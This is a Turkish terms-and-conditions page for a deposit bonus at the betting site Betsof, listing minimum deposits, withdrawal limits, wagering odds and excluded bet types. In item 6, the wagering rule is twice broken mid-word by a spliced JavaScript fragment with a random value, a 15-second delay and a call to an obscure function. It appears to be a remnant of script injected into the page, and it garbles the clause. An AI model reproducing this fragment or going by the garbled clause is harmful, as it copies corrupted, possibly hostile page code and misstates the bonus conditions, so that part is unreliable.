100 TL Sizden 40 TL Bizden

1. Bu promosyon tüm yatırım yöntemleri için geçerlidir ve sadece Pazartesi – Cuma günleri arası geçerlidir.

2. Bu promosyondan yararlanabilmeniz için minimum 100 TL yatırımınıza talep edebilirsiniz. Bu promosyondan gün içerisinde alınabilecek maksimum bonus miktarı 40 TL’dir.

3. Bu promosyonda minimum çekim limiti 300₺ maximum ise 1000₺ ‘ dir.

4. Yatırımınızın hesabınıza tanımlanmasının ardından, herhangi bir işlem yapmadan canlı destek hattına bağlanarak bonusunuzu talep etmeniz gerekmektedir. Bakiyeniz güncellendikten sonra 24 saat içerisinde yapılmayan talepler geçersiz sayılacaktır.

5. Her yatırımınız için bir bonus hakkınız bulunmaktadır. Bu promosyon başka bonuslar ile birleştirilemez. Bonus alındıktan sonra bakiye sıfırlanmadan ve açık kuponunuz varken yeni bir bonus talep edilemez.

6. Çekim işlemi yapabilmeniz için; Ana paranızı minumum 1.60 orandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andan 1 katı, Almış olduğunuz bonus miktarını min. 2.00 orandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andan 2 katı çevirmeniz gerekmektedir.Anaparanızı 1.60 altında oranlara çekim yapana kadar oynayamazsınız.Anaparanızı ve bonusunuzu farklı müsabakalara almanız gerekmektedir. Çifte şans – iade – tek/çift – kart – korner – Cashout seçimlerinde kullanılamaz.(Anapara; kombine kuponlarda her oranınızın minimum 1.60 oran olması gerekmektedir.)(Bonus ; kombine kuponlarda her müsabakanın minumum 2.00 olması gerekmektedir.)

7. Aynı karşılaşmaya yapılan Alt – Üst vb. karşılıklı kuponlardan, sadece birincisi çevrime dahil edilir.Anaparanızı ve bonus kasanızı farklı müsabakalarda kullanmanız gerekmektedir.

8. Futbol ve Basketbol spor türlerindeki bahislere kupon yapabilirsiniz.

9. Betsof Risk Departmanı, hesabınızla ilgili herhangi şüpheli bir işlem tespit etmesi durumunda, bu bonustan yararlanamazsınız. Genel Bonus Kuralları ve Şartları, olası risk unsurlarını belirtmektedir.

10. Betsof kampanyada değişiklik yapma ya da kampanyayı iptal etme hakkını saklı tutar.